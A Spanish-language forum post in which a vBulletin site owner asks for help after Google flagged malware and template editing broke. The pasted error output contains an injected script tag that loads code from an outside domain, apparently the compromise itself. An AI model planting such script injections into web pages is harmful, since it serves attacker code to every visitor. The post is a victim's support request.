Esta es una discusión en el tema Software Malicioso dentro del foro vBulletin 3.x, parte de la categoría Soporte para vBulletin en español; Hola a todos de la Comunidad vbSoporte . estoy aqui para ver como solucionar el error de mi web el cual me tira muchos errores al cargar las paginas y esta demasiado lag.. Google me reporto que tenia un software malicioso! :S el cual es un script agregado a mis ...
| | |
| | Hola a todos de la Comunidad vbSoporte . estoy aqui para ver como solucionar el error de mi web el cual me tira muchos errores al cargar las paginas y esta demasiado lag.. Google me reporto que tenia un software malicioso! :S el cual es un script agregado a mis plantillas pero tampoco puedo editar mis plantillas .. Cuando quiero editar plantillas me sale esto ! ![]() Nose cual seran las razones los produtos instaladas son los de esta foto.! ![]() Los datos que me salen en error son : IP Address : 89.131.55.251 Username : No Registrado Classname : vB_Database MySQL Version : <script src=http://jorgealcidesbuffa.com/Resguardos/test.php></script> Porfavor espero de su ayuda porque mis usaurios se estan llendo del Foro !! |
|
| ||||||
| Herramientas | |
| Desplegado | |
| SEO by vBSEO 3.3.2 ©2009, Crawlability, Inc. La franja horaria es GMT -5. Ahora son las 01:42. |